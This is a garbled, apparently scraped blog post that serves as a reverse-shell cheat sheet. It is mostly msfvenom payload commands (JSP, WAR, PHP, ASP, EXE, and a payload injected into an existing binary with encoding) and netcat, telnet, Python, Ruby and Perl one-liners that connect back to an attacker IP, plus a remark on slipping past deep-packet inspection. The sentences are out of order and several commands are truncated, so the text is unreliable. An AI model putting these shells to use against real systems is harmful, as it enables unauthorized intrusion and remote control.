This post I made my best to be easy to understand for beginners. If you intersted to know, I'll make other post specifically on the particular topics. I'm not here to talking about exploitation techniques or shellcoding. JSP msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.1.101 LPORT=443 -f raw > shell.Hello and welcome again! In this post I'd love to share to you my small knowledge on reverse shells specifically on linux target. WAR msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.1.101 LPORT=443 -f war > shell.war msfvenom -p php/meterpreter_reverse_tcp LHOST=192.168.1.101 LPORT=443 -f raw > shell.phpĪSP msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.101 LPORT=443 -f asp > shell.asp You can use it on both Linux and Windows. Python python -c 'import socket,subprocess,os s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) s.connect(("ATTACKING-IP",80)) os.dup2(s.fileno(),0) os.dup2(s.fileno(),1) os.dup2(s.fileno(),2) p=subprocess.call() ' Ruby ruby -rsocket -e'f=TCPSocket.open("ATTACKING-IP",80).to_i exec sprintf("/bin/sh -i &%d 2>&%d",f,f,f)' Perl perl -e 'use Socket $i="ATTACKING-IP" $p=80 socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp")) if(connect(S,sockaddr_in($p,inet_aton($i)))) ' Telnet ATTACKING-IP 80 | /bin/bash | telnet ATTACKING-IP 443
Telnet rm -f /tmp/p mknod /tmp/p p & telnet ATTACKING-IP 80 0/tmp/p If you are on a pentestjob you might not want to communicate unencrypted.īind ncat -exec cmd.exe -allow 192.168.1.101 -vnl 5555 -ssl One feature it has that netcat does not have is encryption. Ncat is a better and more modern version of netcat. Without -e flag rm -f /tmp/p mknod /tmp/p p & nc ATTACKING-IP 4444 0/tmp/p With -e flag nc -e /bin/sh ATTACKING-IP 80 Inject payload into binary msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.101 LPORT=445 -f exe -e x86/shikata_ga_nai -i 9 -x "/somebinary.exe" -o bad_binary.exe Staged payload msfvenom -p windows/shell/reverse_tcp LHOST=196.168.0.101 LPORT=445 -f exe -o staged_reverse_tcp.exe Non-staged payload msfvenom -p windows/shell_reverse_tcp LHOST=196.168.0.101 LPORT=445 -f exe -o shell_reverse_tcp.exe msfvenom -p windows/meterpreter/reverse_https LHOST=192.168.0.101 LPORT=443 -f exe -o met_https_reverse.exe Since it is hidden in https the communication is encrypted and can be used to bypass deep-packet inspections. It makes the meterpreter-traffic look normal. Set payload windows/meterpreter/reverse_tcp
Standard meterpreter msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.101 LPORT=445 -f exe -o shell_reverse.exe This can be caught with metasploit multi-handler but not with netcat. First it sends some parts of it and sets up the connection, and then it sends some more.
This can be useful for when you have very small buffer for your shellcode, so you need to divide up the payload. This can be caught with metasploit multi-handler. A non-staged shell is sent over in one block. There is an important difference between non-staged and staged payload. Many of the ones listed below comes from this cheat-sheet: This is s great collection of different types of reverse shells and webshells.
Netcat reverse shell how to#
Common ports\/services and how to use themīroken Authentication or Session Managementĭefault Layout of Apache on Different Versions
0 kommentar(er)
